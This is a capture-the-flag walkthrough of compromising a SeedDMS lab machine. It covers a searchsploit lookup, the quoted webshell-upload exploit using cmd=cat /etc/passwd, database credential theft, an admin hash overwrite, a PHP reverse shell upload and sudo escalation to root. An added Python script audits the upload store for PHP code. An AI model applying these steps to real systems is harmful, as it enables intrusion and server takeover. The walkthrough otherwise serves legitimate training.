ailx10
1. Boot the target (Ubuntu_CTF).
2. Host discovery: the target is at 192.168.199.109.
3. Port scan: ports 80 and 3306 are open.
4. Web homepage: it shows the quote "Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker." - Emmanuel Goldstein
5. View the page source; a clue is found in a JS comment.
6. Visit the page.
7. Search for known vulnerabilities: searchsploit SeedDMS
8. The vulnerability summary shows that you must be logged in before the file upload vulnerability can be exploited.
└─# find / -name "47022.txt" 2>/dev/null
/usr/share/exploitdb/exploits/php/webapps/47022.txt

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

9. In conf/settings.xml the MySQL credentials are found: dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms"
10. Log in to MySQL and look for the web application's username and password; the credentials found in the users table do not work for logging in to the web application.
use seeddms;
show tables;
select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1           | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
11. Continue with the tblUsers table and find the admin password hash.
12. Crack the MD5 online[1] (lightning fast; the "undefined" result presumably means the lookup failed, awkward), but login still does not work.
13. Overwrite the MD5 value
└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1
83b70504e0d8742dd5b66e6962eb8a35
update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";
select login,pwd from tblUsers;
14. Log in again; the password is now correct.
15. Upload a reverse shell using the PHP reverse shell script that ships with Kali.
└─# find / -name "php-reverse-shell.php" 2>/dev/null
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/tmp/mozilla_ailx100/php-reverse-shell.php
Change the IP address and port in the script.
Upload succeeds.
16. Start a local listener, then open the uploaded reverse shell from the web page; the shell connects back.
The uploaded file ends up renamed to 1.php.
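The whole chain depends on SeedDMS serving uploaded documents from data/1048576/<document_id>/ and the web server executing a PHP file stored there. As an added example that is not part of the original write-up, the following Python audit walks that directory and flags any stored document containing a PHP open tag, whatever its extension (the directory layout is assumed from the page; the sample tree is constructed):

```python
import re
import tempfile
from pathlib import Path

# Matches "<?php" or the short open tag "<?=" in the first chunk of a file.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
HEAD_BYTES = 64 * 1024  # only the first 64 KiB of each file is inspected


def scan_dms_store(data_root):
    """Return sorted (document_id, path relative to the content folder) pairs
    for files under data_root/1048576/<document_id>/ that contain a PHP tag."""
    findings = []
    base = Path(data_root) / "1048576"  # default SeedDMS content folder (from the page)
    if not base.is_dir():
        return findings
    for doc_dir in base.iterdir():
        if not doc_dir.is_dir():
            continue
        for path in doc_dir.rglob("*"):
            if not path.is_file():
                continue
            with open(path, "rb") as fh:
                head = fh.read(HEAD_BYTES)
            if PHP_TAG.search(head):
                findings.append((doc_dir.name, str(path.relative_to(base))))
    return sorted(findings)


def build_sample_store():
    """Constructed sample tree that mirrors the layout described on the page."""
    root = tempfile.mkdtemp(prefix="seeddms_")
    base = Path(root) / "1048576"
    (base / "7").mkdir(parents=True)
    (base / "7" / "1.pdf").write_bytes(b"%PDF-1.4\n% harmless constructed document\n")
    (base / "8").mkdir()
    # Constructed marker only: a PHP open tag with an empty body.
    (base / "8" / "1.php").write_bytes(b"<?php /* constructed sample */ ?>")
    (base / "9").mkdir()
    # Disguised extension: the tag, not the file name, is what gets flagged.
    (base / "9" / "1.txt").write_bytes(b"notes\n<?= 'constructed' ?>\n")
    return root


if __name__ == "__main__":
    for doc_id, rel in scan_dms_store(build_sample_store()):
        print(f"document {doc_id}: PHP tag found in {rel}")
```

Run it against the real data directory on the SeedDMS host (for example nightly from cron) and alert on any finding; a document store should never contain PHP code, whatever the file extension says.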
17. Switch user with the username and password from the users table, then use sudo to obtain root.
select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1           | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
That completes the exercise.

References
[1] MD5 cracking: https://pmd5.com/
Published 2022-08-27 12:44